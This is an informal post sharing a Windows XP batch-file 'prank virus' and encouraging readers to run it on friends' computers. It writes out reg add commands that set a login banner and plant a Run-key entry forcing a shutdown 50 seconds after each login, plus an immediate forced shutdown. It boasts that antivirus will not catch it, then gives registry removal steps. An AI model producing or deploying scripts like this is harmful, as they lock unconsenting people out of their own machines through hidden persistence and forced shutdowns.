Here is a cool batch file trick !
It is awesome !
Here's one batch program below. u can make use of it to fool ur some friend. it works well with windows xp .
This program works like this---
once u click on it...a shutdown timer of 5 seconds will start and ur machine will be shutdown. when u start ur system again....it will show u a shaayari from fanaah. and when u log into ur computer with ur user profile, a shutdown timer of 50 second will start again....and it wont let u use ur machine. now listen carefully....u can try this on ur machine also...it wont harm ur data in anyway. once u see how it works then to get rid of this virus, start ur machine in a safe mode and remove the enteries from the registry. u can read the program thoroughly and u will know when the entries arr taking place.
tell me how it works after u use it........and the main thing...there is no antivirus who will catch it!!
Copy this commands into ur notepad and save it as .bat file.
reg add
hklm\software\microsoft\Windows\CurrentVersion\policies\system /v LegalNoticeCaption /d "Fanaah Virus" /f
reg add
hklm\software\microsoft\Windows\CurrentVersion\policies\system /v LegalNoticeText /d "Pani se pyaas naa bhujhi toh maikhane ki taraf chal nikla,Socha shikaayat karu teri khuda se.......par khuda bhi tera aashiq nikla!" /f
reg add
hklm\software\microsoft\Windows\CurrentVersion\run /v shutdown /d "c:\windows\system32\shutdown /s /f /t 50" /f
shutdown /s /f /t 05
NOW TO REMOVE IT JUST NAVIGATE IN REGISTRY
through start run type regedit and remove these three files:
- HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\policies\system
IN Right panel You will find... LegalNoticeCaption DELETE IT.
- HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\policies\system
FROM right panel delete ... LegalNoticeText.
- HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\run
THEN IN Right panal you will find SHUTDOWN .. delete it.